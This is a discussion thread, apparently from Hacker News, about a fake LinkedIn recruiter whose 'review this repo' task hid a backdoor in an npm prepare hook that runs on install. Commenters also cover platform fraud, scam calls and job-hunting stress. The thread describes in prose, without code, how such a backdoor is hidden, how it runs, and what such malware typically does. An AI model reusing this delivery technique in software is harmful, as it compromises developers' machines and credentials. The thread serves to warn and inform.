> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”
> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.
> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.
> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.
Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
surprise is unwarranted as linkedin enshittifies. This type of thing is exactly what happens when neither the user of the service, nor the third party commercial interests are being served by the commercial enterprise. It's a vacuum that scams enter into.
Friends don't let friends use NPM. At this point it is so wildly crazy watching people get owned, I don't understand how anyone uses it when they could use e.g. PNMPM and block one if the most obvious and frequently exploited holes. These tools with arbitrary code execution when trying to download some code have got to stop.
I know you are joking, but there is something about this that I really don't get. "Friends" here really means "a professional network". Many nerds despise having one or maintaining/building one. At the same time, people pour weeks/months/years of their life into optimizing their modest investment portfolios. 0.01 percentage points of yearly cost differences of some passive ETF. That surely compounds. But you know what also compounds? Knowing somebody who knows somebody who has $skill or $job_posting. In a big way. Your work comp is still the biggest source of income for most, but investing into optimizing it by broadening your network is something people don't want to do. They'd rather discuss the tax implications of nuances of some investment portfolio.
I don't disagree, but broadening your network is a very different skill (being social) than handling investment portfolios. And for some of us, it's not that we necessarily despise creating or maintaining a network, it's that we suck at it.
Github / Microsoft could easily fix this, couldn't they? Leaving NPM up in its current state seems criminal, especially since LLMs generate NPM commands so frequently.
Is it possible to fix it in a backwards compatible way? Removing lifecycle scripts is at least a semver major change, and would complicate existing projects relying on packages with lifecycle scripts from upgrading.
This is a real world trolley problem scenario. You can break workflows or you can let everyone get pwned by supply chain attacks. Which is the greater harm?
I agree, but I’d extend that to any language using a package manager at this point. “A little copying is better than a little dependency” even more correct now.
All my current projects have all the code needed in the repo (unless impossible, and aside from a compiler which I guess could also be compromised)
>These tools with arbitrary code execution when trying to download some code have got to stop
But you still end up with the code on your machine and risk it being ran.
Bigger issue is giant, inscrutible dependency trees.
In this example, if they tried to run the test suite or application, they'd have been in the same boat.
Afaik all or most languages have some way to run arbitrary code at install time but it seems node is the main one getting targeted. I think the bigger issue here is just people running untrusted things.
Claude Code regularly installs dependencies using (p)npm after I e.g. pull a company main branch to get in sync with my teammates. That happens often. So I pull, Claude edits some code as you requested and it should pass because Claude did alright, but your local box has out-of-date deps. So then Claude runs (p)npm i and now we have automatic exploitation of this gaping hole in npm given extremely common and current AI tooling. Someone has to figure out how to stop AI from running that command or NPM needs to stop that behavior, and I guarantee you it will be easier to get one tool to change than all AI.
The lockfile should protect you there. It'd only be an issue if you're working on updating dependencies in which case there's other protection like min-release-age
If pulling down your company repo and running `npm install` can lead to a compromise, something has went terribly wrong with your company's security setup.
LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
We've had fake recruiters that claim to work for us running basically the same scam. These are great fake profiles: LinkedIn Premium, tons of relevant posts, etc... but they don't work for us, and we get angry messages from people saying our recruiter tried to scam them. No, they're not our recruiter despite showing up on our company page on LinkedIn. No number of reports could get them taken down.
I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn, but not all startups have that connection!
My last 2 companies, LinkedIn asked me to add an email address associated with the said company and actually confirm via said email in order to add them to my profile. So, if I worked for FooCompany, I had to have a @FooCompany.com email which is setup by someone at the company itself. Does this not cover what you're talking about?
According to my research, LinkedIn only does this for executive and now recruiter-like titles, but not broadly. You may be able to in order to get "verified on LinkedIn" but it's not a requirement for showing association with a company.
I have the same. The difference is, if you do email verification, you will "verified" status. If not, you can still add the company to your linkedin, just unverified, which is not a label.
Email domains of employee addresses aren't necessarily owned by the company. For example:
- a startup with legacy personal email addresses from one or two universities
- a spin-off sharing the email domain (and the whole IT infrastructure) of the parent company
- cheapskates using six approved free email services
For security purposes, on the other hand, the important part is proving that the LinkedIn account is owned by the organization.
>I finally got it solved by buying drinks for a buddy of mine that works for LinkedIn
I'd like people to understand that this is a form of corruption. We've normalized many like it. LI knows that the only way to force them to fix the issue is to go through a drawn-out legal process, save a spate of bad press (RIP 60 Minutes), so of course they won't.
And I'd like people to understand that, legally, corruption necessarily envolves the government. Informally, corruption has been applied to any type of bureaucracy but, even then, an exchange of favors itself isn't corruption, only if an unauthorized deviation from the involved agent's role happens.
Legally ‘corruption’ doesn’t exist, as in there is no single law saying ‘corruption is illegal’. (What is ‘corruption’ exactly?)
There are laws against bribery, which does generally only apply to the government, but in many locations applies to pseudo-government roles like notaries, apostiloes, lawyers, etc.
There are laws against embezzlement (a type of corruption), and those definitely apply to private individuals.
There are laws against insider trading, a type of corruption. Those generally only apply to businesses/private folks, not the government, with some exceptions.
Then there is the various kinds of fraud, blackmail, etc. Most people would consider them corruption too. Those apply to private individuals and government agents too.
Brazillian law, for instance, defines the crimes of passive and active corruption:
The Penal Code, in Article 317, defines the crime of passive corruption as "soliciting or receiving, for oneself or for others, directly or indirectly, even if outside the function or before assuming it, an undue advantage, or accepting a promise of such an advantage." [0]
Active corruption, committed by an outsider, who offers or promises an undue advantage, is provided for in Article 333 of the Brazilian Penal Code. [1]
But, granted, revieweing US and UK law, it seems they don't define "corruption" as a crime (albeit some of the act names do mention corruption). So let's fallback onto the dictionary: [2]
a: dishonest or illegal behavior especially by powerful people (such as government officials or police officers) : depravity
b: inducement to wrong by improper or unlawful means (such as bribery)
c: a departure from the original or from what is pure or correct
Both definition a and c are too ample and, as you put it, "a smorgasbord". Definition b, specially when combined with a, describes something pretty specific: inducement of a powerful agent to wrong by improper or unlawful means, such as bribes.
Embezzlement is better typified under theft. Same goes for most of the others: fraud is fraud, blackmail is blackmail. They may acquire a "corrupt" character when they are done in direct exchange of personal material gains. There are discussions about whether insider trading should be illegal.
Generally speaking, corruption is primarily a crime against public administration because it involves the government, which (supposedly) represents the people. Private companies represent themselves, so they get to (more) trivially decide who is on the line or not.
False. [0] If the bank teller demands a bribe to let you withdraw from your account, that's corruption, even though they aren't working for the government.
> Corruption is the dishonest, fraudulent, or criminal use of entrusted authority or power for personal gain or other unlawful or unethical benefits. Corruption occurs in politics, business, education, media, and other social and economic fields.
That sure is an interesting take from someone with "anarchist" in their username. IMHO corruption is any time you use power/influence/station in order to skew the normal well-behaved channels of governance (cybernetics) for personal gain. Any system with hierarchy can have corruption. Bernie Madoff was an example of illegal, private industry corruption.
I agree with you. I used to work for an ISP that sold kind-of overpriced 1Gbps connections and always wondered why customers bought it. Probably helping things was that we took them out to "events", floor seats at basketball, etc. The company just has a fixed expense, but the people making the decision get free stuff that makes them feel important, and it was kind of a way of transferring the company's money (by not buying the $29/month Internet connection) to themselves. I never felt good about it, but if you say that out loud, everyone will look at you like you're crazy.
AWS did this for us at the time but the 3 people in the company that used AWS services never got to go to these things. So I doubly don't get it.
Vendor bribe swag is basically ubiquitous in the industrial world. When I worked in oil and gas it was quite common for a vendor to do a 'lunch and learn' where they bought the whole office very good lunch and we listened to them pitch whatever product line they wanted us to specify for design customers. I work in a more socially responsible but less lucrative industry now and alas no vendors buying me lunch
LinkedIn doesn't have any redressal mechanisms for anything. Someone I knew went through a lot of abuse by a LI user and kept making new accounts to harass. LinkedIn's response - "We did not find anything that violates our ToC". No wonder it has become a cesspool of spam, fraud and abusers.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I remember getting an office manager, working from Dubai (I think), for my one-person, basically nonexistent company, working from my living room, in New York.
She may still be there. I never bother checking into LI, except making an occasional post, every few months.
I was looking for people who I had worked with at a company that was acquired 15 years ago, and some random person claims to be the CEO of that company.
> got it solved by buying drinks for a buddy of mine that works for LinkedIn
That it requires you to buy your buddy a drink says it all. They should have taken the general issue to their higher ups, fixed it for you and then bought you a drink. Or dinner, on LinkedIn's dime.
I know it is only a partial solution, but I saw with some companies that LinkedIn provides a way to verify a user works at such a company. This is done via sending an email to a company domain email address (supposedly yours that you provide), and then approving it from your work laptop. I guess the administrators of the company account on LinkedIn can determine which domains are allowed for this.
The only way this could be abused is if the administrator accounts on LinkedIn itself get hacked and temporarily other email domains are added to the whitelist (or if an approved user themselves got hacked on LinkedIn [or their work email for that matter]). These are all the usual vulnerabilities in any system.
I understand that it would be too extreme to only allow users to claim they worked at a company if this verification is done, but maybe putting a warning if you get a message from a recruiter/someone that has not verified they work at their 'present' company could go a long way (instead of right now tucking away the verified logo quietly on their profile page).
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
I had the opposite problem: my company name was equivalent to the owner of an online casino. It took me a year to figure out that the enormous amount of spam I was getting about ‘guest post placement’, and people contacting me about deals was because Linkedin put me among the list of the casino employees. As I was Director of my company, I was the most valuable prey for business spam.
I fixed the problem by deleting my account, but now I’m in all the shittiest of spam lists for eternity. I don’t know how do they even harvest emails from Linkedin.
this is from 2016. at time they had ~400 million users,and the breach is 164 million, Now it's close to 1.5 B.
People these days use aggregators like Apollo, signal hire, apify. There are 1000s of such tools.
I had it several years ago when I was running my own one-man consultancy [ie: self-employed] ... somehow I'd managed to have six or seven people on LI claiming to work for the same company.
Reported them to LI and nothing was ever done about it. Eventually the accounts disappeared as I guess they were either shut down or repurposed.
> LinkedIn offers no way for $company to disavow users who claim to work for $company - they will appear on the official company page as long as it's in their profile.
It isn't at all a neat solution, but you could maintain a list of users on LinkedIn that are authorised to speak for your company, linked prominently on your profile with a warning that anyone else claiming to work for the company is likely a scammer but LinkedIn offers no way for you to stop them claiming to be part of your company.
If that became a common pattern it could highlight how much of a scammer paradise LI can be and maybe they'd be more likely to do something about that particular vector.
<I wonder if a cease and desist to their legal department would work better?>
I assume you mean the LinkedIn legal dept. The problem there is that these companies are so big that a 'complaint' or 'cease & desist' to them would be like a mosquito bite, if that, & most likely get lost in the 10s of thousands of other complaints.
It's the same with FB & Insta, etc. One of my daughters had a FB acct taken over that she had accumulated quite a following (~100k plus) with her custom hand drawn artwork. It was impossible to get any acknowledgement of the issue let alone get a suitable solution. And, unfortunately these large companies do not care. Sometime makes you wonder if LinkedIn & the like are even worth it
Things like this where a tried and tested method on Upwork, particularly in the 2021-2022 crypto/nft highs. At some point they branched out from crypto projects and cast a wide net across different categories.
Last I recall was a download of a windows scr (screensaver masquerading) file.
Linkedin is a new low, and I'm sure the platform doesn't really care (look, more jobs), just as ad network companies (Google, Meta) don't really care about scam ads.
I'm not. I call it identitythiefresourcecenter.com or its shorter name freecriminalresource.com
I hate how normalized it became for "HR" to require you having a LI page for a job. I don't think its as bad now but for a while it was essentially not possible to get a job without putting all your personal info on linkedin.
I recently went through an interview—o-thon and got a couple obvious scammers. I hope it’s because it’s more prevalent, and not because I seem stupid enough to fall for it!
It’s been this bad for a little while, iirc have seen a few of these pop up over the last few years. And that’s just for the few someone’s caught/documented
I've been freelancing for over a decade. This stuff is every third crypto related job. They're all malware repos running scripts the moment you turn on vscode hoovering up everything they can on your computer.
It's the least surprising thing once you've put yourself out there, very strange watching people here think it's novel, I expect it by default at this point, a stranger handing you code needs to go into a vm, would you let them hand you some candy with a wink too?
while working at a Fortune 500 MNC, gig before this one, I used to get LinkedIn hits from recruiters.
never got serious ones before, the occasional, useless headhunters who are clearly not based in the same country, but these were different. They were big companies in Canada, ones I'd definitely heard of and even applied to in the past. They were direct, were recruiters for those companies themselves, and were plugged in, able to answer questions, and engaging.
they constantly sent job ads, but only via .pdf files. I even pushed back on one and said I don't open random pdfs, send me a link and they declined. Same recruiter hit me up for a similar role a month later, also via pdf.
Multiple other members of the IT org, esp. the security and infra teams, also reported similar, aggressive recruitment efforts with pdfs. This was around 2020-2021.
Job candidates keep facing a lot of hurdles, including scams, Trojan horses like the one presented here, ghosting, wasting candidates' time, nepotism, etc. As a candidate you can easily spend more than 8 hours a day looking for opportunities, switching stacks, studying, doing take-home projects, etc, for absolutely nothing. Life is precious and shouldn't be burned like that!
> Life is precious and shouldn't be burned like that
Very true. I remember when I was job hunting fot 2 years post-graduation, that these time sinks started to take meaning away from life and induced cynicism and depression (to an extent).
It's easy to forget all that once you end up getting a job, but remember to always be human and show empathy if a person cold-reaches out to you.
It is absolutely the worst. Also the feeling that this task of job searching is supremely important. You feel guilty doing anything that isn’t job searching. Meeting friends? Spending money while you aren’t making any? Seems irresponsible internally. When your day fills with stuff that isn’t job searching it makes you feel that day was a failure. Even when you do job search and you have say a month without any bites, it also makes you feel that month was a failure. You feel like you are wasting your life. At least when you had a job, that time spent counted for a little more experience. Every second without a job feels like it counts against you. You feel like a leper. Look at me who failed to secure a job, I must be a failure, you think internally.
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
I see several comments like this implying nothing can be done. But that is far from the truth. First, an agency that actually answered the phone could coordinate directly with LinkedIn and other tech companies to quickly take down these fake accounts and minimize harm to others. We all know how incredibly hard it is to contact a tech company. Second, an agency that answers the phone could help less technical people find what may have been compromised and push people towards support services if needed. And finally, maybe, they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time.
Won't that require laws that allow the said agency to compel LinkedIn or whatever tech company to actually pay attention and take action? Like laws compelling tech companies to unlock the bootloader once they stop supporting a device.
I wonder why such common sense laws don't exist and who is preventing them from being introduced and passed despite wide public support in general?
I'm not a lawyer but it would be odd if a government agency couldn't communicate a possible threat to a tech company. It is in a company like LinkedIn's best interest to set up a phone number/channels for a centralized agency to communicate potentially malicious accounts and other emerging threats. I suspect that actually already exists for big companies. I doubt they are required to -do- anything without laws but this seems like a win that is easy for all sides. The problem is likely mostly on the US (and other govt) side of things. No clearly defined agency with a clear mandate, resources and leadership to take on this task.
You're describing the FBI or your state level equivalent. And they actually do exactly what you are describing, but in measured efforts. I've even had them come by my place of employment before. They clearly lack the resources to work at this scale though.
The problem with a phone number you suggest is that it will get spammed and abused with fraudulent imposters too (the complete and utter destruction of trust in phone calls and text messages should also be corrected by the government, but that's a different topic).
Taking things down doesn't help much unless the platform has something in place to make it hard to recreate them.
>they could do the hard job of combining leads and working with appropriate agencies to maybe find and prevent these things over time
At least in the U.S., everyone will cry government overreach and no one will fund it. In other countries, they should probably just ban U.S. platforms unless they're reachable and actually resolve these type of problems.
Sounds like socializing the harms instead of requiring these companies to bear the burden themselves. Could still be a valid approach but I'm afraid it will make them take less responsibility, not more.
Something I've always wondered, because I'm a bit of a contrarian and I wonder if we're really any different: Could an American citizen hack and steal from Iranians and Russians with impunity from America? The issues that prevent the US from extraditing Russians who hack us -- don't they work both ways?
Legally speaking, no - it would still be a criminal offence.
Practically speaking, there is zero chance that the USA would extradite someone to Iran, even if they weren't currently at war with them. Whether they did anything about it would probably depend on exactly what the situation was - there's a big of difference between targeted IRGC or defence systems and ransomwaring an Iranian hospital or scamming random citizens.
Where they'd probably get you is if you tried to monetise it, and get stolen/extorted cryptocurrencies (or whatever) into your bank account. But that could easily fall under tax evasion laws rather than computer misuse ones, because they'd be a lot easier to prove in court.
It would be very dependent on the exact circumstances - who made a complaint, what exactly they're accusing you of, what evidence there is, how high profile it is, the current diplomatic position (which changes by the hour), etc, etc. I don't think you can really get a simple answer for this kind of question.
As far as I know it has never happened. On the contrary, when Alejandro Caceres admitted to ddosing North Korea - taking down all their public websites for a week - he was questioned by the FBI who decided to take no further action.
secondary is the effort asymmetry between spinning up one of these scams (near 0 effort) and catching/prosecuting these scams (big effort, astronomical cost)
I don’t know but the us kidnaps ehhh arrests people on foreign land on a regular basis… and brings them to the US to stand trial. So if it’s “important” enough it will be aced upon…
you arent getting jail for life for this, even in the extremely remote chance you are caught. you are probably getting more than one guy's computer, though.
406 MHz is pretty close [1]. If you have a radio that screams on that channel, chances are the nearest search-and-rescue operation will at least be notified.
You won't hear back from them, though. But, at least for US citizens (and possibly for anyone?), this is as far as I know the closest thing there is to an "Internet 911".
To put it bluntly and perhaps a bit cynically, on the tree of bad things that people do to other people, this is pretty high-hanging fruit. Right up there next to scam phone calls that prey on the elderly while claiming to be from Microsoft support.
It's basically impossible to catch suspects because they are either smart enough to cover their tracks very well, or (more often) live in countries whose governments don't care about their citizens (even pay them for) scamming westerners.
Wonder if they’re effective in going after reports. I’d still report to IC3/FBI/powers that be, too. Just in case someone somewhere has the resources to do something… perhaps a high hope
I get more calls from Google Security than any other thing. Oddly the Pixel's built in scam detection and call screening lets them through without fail. I normally don't have my phone even ring unless it's in my contacts, but saying you are calling from Google is like a magic code.
Hard disagree on the scam phone calls. It would be trivial to eradicate them almost completely if the phone operators did the bare minimum to fight against it. At any point in time, any given US phone number is handled by exactly one phone carrier. There is nothing stopping that carrier from requiring name and address to issue that phone number. They already do for 99.99% of their legitimate customers. It would be very easy to make it so that every single phone call originating from the US, including all VOIP calls made with US phone numbers, can be traced back to a specific business or person that can later be sued or prosecuted.
And no, number spoofing isn't an excuse either. We literally solved the much harder problem of email spoofing already. There are, what, 3 carrier networks in all of US? And they cannot do with each other what DMARC did for the hundreds of thousands disjoint organizations that comprise the internet? Please.
KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure. This is on par with being unable to open a bank account if the capability is matured. I'd advise that you think long and hard about the consequences of this system being applied against you maliciously before signing on the dotted line.
> KYC just for a phone number opens the door for societal ostracization and essentially blacklisting of people from infrastructure.
We have that in Europe and the world has not fallen apart. On top of that, we don't have even close to the scale of problems with scammers that the US has. I won't deny we don't have scammers because we absolutely have them, but they are far from the scourge they are in the US.
> This is on par with being unable to open a bank account if the capability is matured.
The secret is... we have constitutionally protected rights. Unless you do not pay your bills, your phone line will not get disconnected. And same for bank accounts - every European has the right to a basic banking account, even if you are a target of foreign sanctions [1].
I'm in the US, I have two 20-year old phone numbers and 1 cell number, none ring through with span or scams.
I wonder why that is? I dont give the numbers out. That's why. Whenever a store says "do you gave a number with us" I say I don't have a cell phone. If they can plainly see I do have a cellphone, I add, "for that."
The second part is shopping at stores that dont tie prices to your having given them a number.
There already are laws that would prevent the exact thing you're talking about. A requirement to provide name and address would change absolutely nothing. And if legal protections are not enough for you then what are we even talking about? Your phone carrier could disable all your lines this instant with a few clicks if they wanted to; the technical capability is already there. They also have your name and address from listening to phone calls and triangulating cell towers - though realistically they didn't need to do it because you already gave them your details knowingly and willingly as part of starting the service, didn't you?
I'd advise that you think long and hard about the consequences of the current system before saying the alternative is worse.
Number spoofing is not a solved problem because some carriers, which appear legitimate in all other respects, make a business out of routing your traffic over TDM trunks that don't support caller ID verification, and will claim it's extremely expensive to upgrade these to VOIP.
Fuck 'em? That's not a insurmountable problem in the slightest. Google or Apple could probably solve this problem themselves by simply not ringing the phone for any call that doesn't meet ID verification.
The behavior of the phone network is set by government regulation. If you refuse to service allowable calls, you are heavily fined or kicked off the network. The government has to update the rules.
I'd be 100% happy to block those carriers from calling me. Their users should just get a message that calling my number is not supported and they should try calling me from another device.
Not allowed. The same government rules that stop Google from refusing calls from Apple devices also stop them from refusing calls from whoever is doing this. The government would have to update the rules. They could mandate number verification for all calls, even those passing over TDM trunks, and make it the network's problem to figure out how to do that. The rules currently say that all calls which don't pass through legacy equipment must have verified numbers, so there's a market for making calls take stupid legacy routes on purpose.
I always wondered why US cannot pressure India to crack down on those scammers? They use phone network, it should not be difficult to find them. Some youtubers even hack into their computers and extract all the info. US probably has a leverage here, they could simply ban Indian companies from working with US if they don't cooperate.
US was so angry about "unfair" tariffs why are they not angry about criminals stealing from Americans?
There is but the FBI is horrible at responding to cybercrime. They have IC3 but its basically useless. They arent going to help or even contact you if you report a crime to them.
The amount of crime in the world -that requires arguably "low skill" time to resolve- that just gets filed away because of low resources is insane. How are forces going to stand up high skill task forces for these kinds of things?
I presume more countries have this, not sure about the US though (CISA maybe? CERT/CC?). CERT is the overarching org that manages local agencies like this Dutch NCSC. Though I am not sure if and how easy it is, globally, to report incidents.
I don't want to be cynical, but maybe spending hours every day using Claude has made some of us particularly attuned to picking this up. For some reason as soon as I read "The trap was in app/test/index.js," I instantly knew it was Claude. It's too bad, because there will obviously be some false positives, but it makes me immediately disregard the author.
I sometimes use the Claude app with text to speech enabled. It’s got a quite distinctive voice/tempo combo when it’s outputting speech.
Whenever I see a typical Claude-tell in writing, my internal reading voice switches automatically from my internal monologue’s voice into Claude’s voice for the rest of the piece.
This type of attack has been happening a lot the past 2 years. I've seen one that was very well done...the GitHub account of a fairly well known security researcher had been compromised...their identity and code was being used as part of the recruitement. I reached out to the person...who was understandably embarrassed and told me they had reported this to LinkedIn + Github but saw no action.
This is the part that really irks me: LinkedIn and Github know this is the end goal of many of the rampant supply chain attacks but they a) don't have a first class mechanism for reporting b) don't seem to be improving their systems or even warning people. I have been hit be this enough times that I follow along to get screenshots of the scammer. One might think with all the surveillance systems Microsoft/LinkedIn/Github/Google-Meet/Calendly have in place that a potential victim reporting it along with an actual picture of the scammer could get us somewhere.
Call it a conspiracy theory, but I think a lot of these businesses actively avoid making serious efforts because even trying creates expectations. Ones that they don’t want to be on the hook for.
Like the Facebook problem. They were never in more trouble with people and legislators than when they were spending mountains of gold trying to police content.
It’s much easier to shrug and say, “Sorry folks, it’s the internet. Good luck.”
I once saw an ad on LinkedIn made up to look like the CBC (Canadian news) linking to a fake video of the Canadian prime minister announcing a crypto investment plan for all Canadians, with a link to sign up. I reported the ad to LinkedIn and shortly after got a reply telling me they investigated and didn’t find any violation of their policies.
> they investigated and didn’t find any violation of their policies.
When my YT Premium elapsed 70% od ads YT decided to show me were deepfake investment scams (of terrible quality), and Google also didn't find them to violate any of their policy. The remaining 30% were strait up foreign state-level propaganda, those I didn't even bother to report.
Weird, isn't it? Microsoft owns all of LinkedIn, Github and NPM.
All three either have security or stability issues, which seems to get worse, not better, as microsoft goes more into AI. Where is the AI productivity (10x by some accounts!) within the company going to?
Same story for me. I gave them the repo link and messages. Nothing 2 weeks later. Now I just block them and even then, you can't select a proper reason (there's no "other" field for a block), so I just say they're impersonating someone and leave it at that. We cannot let this become the primary site for job postings.
A skilled employee would never skip that step, why should you do so in an interview context? Skipping that step seems like a task failure to me just as much as any other part of the question from an interviewer perspective. Maybe I shouldn't hire the guy that blindly runs code just because someone "senior" to them asks.
Been through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bell start ringing when they insist you to run locally their sh*t
Similar for me. One was for an overly very well paid position. I always run (p)npm audit before running npm repos, so lots of issues were found. I tried to fix them but I would have gone over the time limit. So I asked the recruiter about it and if it makes sense to run it in an isolated VM. No answer...
The other was for a DevEx crypto service. While I was very suspicious the code looked okay but the recruiter was strange and changed their profile to a different person eventually. I think this was a crypto stealing scam though since it required connecting to a wallet. I don't have any crypto though, so I might be okay for now. Although reinstalling my system clean would be the only sure way in theory...
this happened to me too. few things about the process made me suspicious. i downloaded the repo and told claude to "find the malware". took about 15 seconds. remote code execution that would have run upon npm install, iirc. many layers of obfuscation. in implementation, a little different to the op's situation but there are similarities. it was a "crypto startup". maybe they think people in crypto world are more forgiving of idiosyncrasies in the recruiting process? i reported the recruiter's profile to linkedin, with extensive details. they said they wouldn't look into it unless i opened a ticket in some other part of their site, lol. however it seems they got onto it, or someone else complained, because i can't find the recruiter "alice kenny" anymore. but the "company" she was recruiting for is still live:
I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png.
I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?
So fed it to qwen. It seems to think it just a downloader and persistence mechanism for another payload. I will try to download it too and see what qwen thinks of that.
That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.
Because uh every OS on earth has the exact same vulnerabilities? How are you supposed to stop a user from downloading something random from the internet and running it?
Sometimes, but nodejs or npm won't work properly without the headless chromium VM, and would need bypassing local file-access security-sandbox restrictions most normal system Web-browsers enforce by default.
If root installs OS supported VM packages, than it would be pointless to complain the system runs as expected. As a sentient turnip, I probably wouldn't know for sure... =3
npm is hard to avoid, as other ecosystems have integrated it as a cross-platform build/installer script bootstrap.
Indeed, all things nodejs are usually a dumpster fire at a hair salon, but the real point here was people always inherit whatever the previous cheapest labor built at that office. Also, usually people don't get to make architectural decisions for a long time. =3
If a build tool has any support for tests, it can execute arbitrary code, since that is what tests are. I am quite sure Maven's pom.xml can install binary jar into local .m2/repository, and later use it as plugin during generate-sources phase - and that is something an IDE will want to do when opening project.
NPM attacks are really product of its popularity (and update churn that community already got used to).
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
Or running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice.
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
Im not sure if anyone will read this, but I consider myself pretty savvy having been on the internet over decades however I nearly succumbed to a highly complex Linkedin "Interview with video call just to get me to install malware".
It was the most bizarely long roundabout way to get me to isntall malware I had ever witnessed I couldnt fathom it was real, I mean they interviewed me for half an hour. Now you might think Im paranoid however it was obvious, their camera was off ( personal preference they said) and well I allowed it... only for other eventual straws to breal the camels back, and I realised "oh uh oh this is just 2 strangers trying to get me to install crap on my laptop for wealth extraction".
I was flumoxed tbh I couldnt believe it, as the approach had been very organic, through Linkedin Dms, just that eventaully I realised I had succumbed to "yes men" ( the only thing that would get passed my already strict job filters ironically) to allow myself into such a comprimising situation.
The only question I had is how did they do such a smooth complex manouver and then I realised... oh they just used AI to come up with the plan and implementation.
This is a common one. I've had at least half a dozen of them. If I'm bored, I play along, and then play difficult and dumb and see how long it takes until they give up.
Some of these will happily get on "interview" calls etc.
For some reason, most (but not all) of them have the same telltale signs of looking for someone to work on a web3/crypto gaming project.
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
A long time ago, I worked for an ISP that sent out the famous "we'll never ask for your passwords" email. Then, about 3 weeks in, they sent out emails asking people for their passwords. If you told me that this was a happy ending, he sent in a check and they sent a laptop and after 2 paychecks released his deposit, I wouldn't be shocked. Some companies are run by idiots. I even know that most companies could probably cover scammed hardware with business insurance, but then I wonder how many flying-by-the-seat-of-their-pants outfits don't have the insurance.
My favorite was a job posting through a company called ladders
Saw it in the soup of other job posting, went to apply, it took me to some other job portal, ok whatever, this is normal, filled out all the forms as one does, and then reached the end and the site told me they'd submitted my application, and here were some other jobs I could apply to with the same application. Useful, right?
Click any of them, or anywhere else on the page, and a full screen modal takeover comes up, demanding you pay $50/application.
I closed the tab, but watched the email they sent me from the first job app. It went nowhere. Eventually applied to the company directly, on their job portal, and when I got to a real recruiter later, they said they never received my first app. My guess is ladders never even sent it and wouldn't until I paid up
Best part was ladders continued to spam my email inbox with job application invitations, each one wanting the same $50, until I blocked the fastmail throw away
I also had a "recruiter" reach out to me about a "role I'd be a good fit in". Made the meeting, and immediately some red flags. Audio and video were about 2 seconds out of sync. Guy then proceeded to try and pitch me on a similar job board, with the same $50/application cost, only this one had a 10 weeks salary cost on placement as well
I told him I wasn't interested.
Maybe these are just more traditional scams or whatever, not the malware type the op is about, but they still piss me off
I work in crypto and this is happening practically every other day. I refuse anyone on LinkedIn that I don't know personally and has web3 or crypto anywhere in the description. It's all fake accounts with fake job offers. It's a pretty known scam.
Worth noting that, this isn't just a risk with npm or other package managers. If you're using LLM agents in the directory of a cloned repo, there's risks in skills, hooks etc automatically executing..
I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."
Turns out they were just fishing for inside information on my employer's end customer's applications.
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
I can not imagine a situation where some random person messages me on linkedin asking me to solve a coding challenge, and I do anything other than block them.
I'm guessing you've never experienced the enormous pressure of needing to find a job to buy food and clothes for your family. That's good, I'm glad that you don't know that feeling. But if you did, you'd know how easy it could be for a person to start feeling more and more desperate for any kind of lifeline.
There is still no chance that my first reaction to a random stranger asking me to do work for them is "sure", without building some sort of connection. Granted, that means I could still get phished via a coding exercise, but it would require a bit more effort on the attacker's part.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Martin from GitHub here - the offending repos have been taken down, but the article from Roman is still very much worth reading to understand the attack vector attempted.
I'm seeing the same. Worth flagging that maintainers seem to be a specific target now, not just job seekers. If you've got commit access to anything popular, backdoors like this become a lot more dangerous, because the supply-chain payoff is much bigger than your laptop
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
> I’ve heard of these attacks and read about them on HN
And, I am reading this on HN right now. What a coincidence!
I read a lot about social engineering and how the human being is considered the weakest layer in the security chain but this is the first time I've came across this pattern. Eye opening indeed.
I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
